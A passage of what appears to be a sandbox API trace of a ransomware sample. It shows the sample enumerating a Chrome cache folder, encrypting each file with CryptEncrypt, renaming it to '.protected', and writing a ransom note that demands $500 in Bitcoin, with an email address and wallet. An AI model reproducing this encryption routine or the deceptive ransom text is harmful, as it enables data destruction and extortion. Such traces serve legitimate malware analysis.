hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.284] lstrcmpiW (lpString1="data_0", lpString2="Windows") returned -1 [0078.284] lstrcmpiW (lpString1="data_0", lpString2="Program Files") returned -1 [0078.285] lstrcmpiW (lpString1="data_0", lpString2="Program Files (x86)") returned -1 [0078.285] lstrcmpiW (lpString1="data_0", lpString2="$Recycle.bin") returned 1 [0078.285] lstrcmpiW (lpString1="data_0", lpString2="System Volume Information") returned -1 [0078.285] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned 92 [0078.285] StrStrIW (lpFirst="data_0", lpSrch=".protected") returned 0x0 [0078.285] lstrcmpW (lpString1="data_0", lpString2="RESTORE_FILES.txt") returned -1 [0078.285] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.285] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned 92 [0078.286] StrStrW (lpFirst="data_0", lpSrch=".txt") returned 0x0 [0078.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned 92 [0078.286] StrStrW (lpFirst="data_0", lpSrch=".rar") returned 0x0 [0078.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned 92 [0078.286] StrStrW (lpFirst="data_0", lpSrch=".zip") returned 0x0 [0078.286] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.307] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.307] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.307] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.307] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.307] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.307] CloseHandle (hObject=0x158) returned 1 [0078.308] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.protected") returned 102 [0078.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0.protected")) returned 1 [0078.308] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.308] lstrcmpiW (lpString1="data_1", lpString2="Windows") returned -1 [0078.308] lstrcmpiW (lpString1="data_1", lpString2="Program Files") returned -1 [0078.308] lstrcmpiW (lpString1="data_1", lpString2="Program Files (x86)") returned -1 [0078.308] lstrcmpiW (lpString1="data_1", lpString2="$Recycle.bin") returned 1 [0078.308] lstrcmpiW (lpString1="data_1", lpString2="System Volume Information") returned -1 [0078.308] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned 92 [0078.308] StrStrIW (lpFirst="data_1", lpSrch=".protected") returned 0x0 [0078.308] lstrcmpW (lpString1="data_1", lpString2="RESTORE_FILES.txt") returned -1 [0078.308] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.308] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned 92 [0078.309] StrStrW (lpFirst="data_1", lpSrch=".txt") returned 0x0 [0078.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned 92 [0078.309] StrStrW (lpFirst="data_1", lpSrch=".rar") returned 0x0 [0078.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned 92 [0078.309] StrStrW (lpFirst="data_1", lpSrch=".zip") returned 0x0 [0078.309] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.322] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.322] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.322] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.322] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.332] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.332] CloseHandle (hObject=0x158) returned 1 [0078.332] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.protected") returned 102 [0078.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1.protected")) returned 1 [0078.344] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.344] lstrcmpiW (lpString1="data_2", lpString2="Windows") returned -1 [0078.344] lstrcmpiW (lpString1="data_2", lpString2="Program Files") returned -1 [0078.344] lstrcmpiW (lpString1="data_2", lpString2="Program Files (x86)") returned -1 [0078.344] lstrcmpiW (lpString1="data_2", lpString2="$Recycle.bin") returned 1 [0078.344] lstrcmpiW (lpString1="data_2", lpString2="System Volume Information") returned -1 [0078.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned 92 [0078.344] StrStrIW (lpFirst="data_2", lpSrch=".protected") returned 0x0 [0078.344] lstrcmpW (lpString1="data_2", lpString2="RESTORE_FILES.txt") returned -1 [0078.344] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.344] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.345] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned 92 [0078.345] StrStrW (lpFirst="data_2", lpSrch=".txt") returned 0x0 [0078.345] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned 92 [0078.345] StrStrW (lpFirst="data_2", lpSrch=".rar") returned 0x0 [0078.345] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned 92 [0078.345] StrStrW (lpFirst="data_2", lpSrch=".zip") returned 0x0 [0078.345] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2000, lpOverlapped=0x0) returned 1 [0078.354] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.355] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2000, lpOverlapped=0x0) returned 1 [0078.355] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.355] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.355] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.355] CloseHandle (hObject=0x158) returned 1 [0078.355] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.protected") returned 102 [0078.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2.protected")) returned 1 [0078.356] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.356] lstrcmpiW (lpString1="data_3", lpString2="Windows") returned -1 [0078.356] lstrcmpiW (lpString1="data_3", lpString2="Program Files") returned -1 [0078.356] lstrcmpiW (lpString1="data_3", lpString2="Program Files (x86)") returned -1 [0078.356] lstrcmpiW (lpString1="data_3", lpString2="$Recycle.bin") returned 1 [0078.356] lstrcmpiW (lpString1="data_3", lpString2="System Volume Information") returned -1 [0078.356] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned 92 [0078.356] StrStrIW (lpFirst="data_3", lpSrch=".protected") returned 0x0 [0078.356] lstrcmpW (lpString1="data_3", lpString2="RESTORE_FILES.txt") returned -1 [0078.356] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.356] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned 92 [0078.357] StrStrW (lpFirst="data_3", lpSrch=".txt") returned 0x0 [0078.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned 92 [0078.357] StrStrW (lpFirst="data_3", lpSrch=".rar") returned 0x0 [0078.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned 92 [0078.357] StrStrW (lpFirst="data_3", lpSrch=".zip") returned 0x0 [0078.357] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.362] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.363] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.363] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.363] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.392] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.392] CloseHandle (hObject=0x158) returned 1 [0078.392] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.protected") returned 102 [0078.392] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3.protected")) returned 1 [0078.393] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.393] lstrcmpiW (lpString1="index", lpString2="Windows") returned -1 [0078.393] lstrcmpiW (lpString1="index", lpString2="Program Files") returned -1 [0078.393] lstrcmpiW (lpString1="index", lpString2="Program Files (x86)") returned -1 [0078.393] lstrcmpiW (lpString1="index", lpString2="$Recycle.bin") returned 1 [0078.393] lstrcmpiW (lpString1="index", lpString2="System Volume Information") returned -1 [0078.393] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned 91 [0078.393] StrStrIW (lpFirst="index", lpSrch=".protected") returned 0x0 [0078.393] lstrcmpW (lpString1="index", lpString2="RESTORE_FILES.txt") returned -1 [0078.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned 91 [0078.394] StrStrW (lpFirst="index", lpSrch=".txt") returned 0x0 [0078.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned 91 [0078.394] StrStrW (lpFirst="index", lpSrch=".rar") returned 0x0 [0078.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned 91 [0078.394] StrStrW (lpFirst="index", lpSrch=".zip") returned 0x0 [0078.394] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.405] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.405] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.406] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.406] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.407] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.408] CloseHandle (hObject=0x158) returned 1 [0078.408] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index.protected") returned 101 [0078.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index.protected")) returned 1 [0078.408] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.408] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.408] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\RESTORE_FILES.txt") returned 103 [0078.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.409] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.409] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.410] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.410] WriteFile (in: hFile=0x154, 